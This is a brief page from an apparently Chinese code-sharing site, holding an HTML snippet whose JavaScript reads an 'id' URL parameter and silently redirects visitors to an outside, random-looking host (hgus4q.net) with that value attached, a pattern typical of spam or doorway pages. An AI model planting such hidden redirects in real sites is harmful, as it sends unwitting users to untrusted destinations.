11111

 

  
  
  
  
  1. <html> 
  2.    
  3. <SCRIPT LANGUAGE="JavaScript">   
  4. <!--   
  5. function Request(strName)   
  6. {   
  7. var strHref = window.document.location.href;   
  8. var intPos = strHref.indexOf("?");   
  9. var strRight = strHref.substr(intPos + 1);   
  10.    
  11. var arrTmp = strRight.split("&");   
  12. for(var i = 0; i < arrTmp.length; i++)   
  13. {   
  14. var arrTemp = arrTmp[i].split("=");   
  15.    
  16. if(arrTemp[0].toUpperCase() == strName.toUpperCase()) return arrTemp[1];   
  17. }   
  18. return "";   
  19. }   
  20.    
  21. window.location.href="http://26585.hgus4q.net/"+Request("id");  
  22. //-->   
  23.    
  24. </SCRIPT>   
  25.    
  26.    
  27.    
  28. </html> 

 

你可能感兴趣的:(11112222)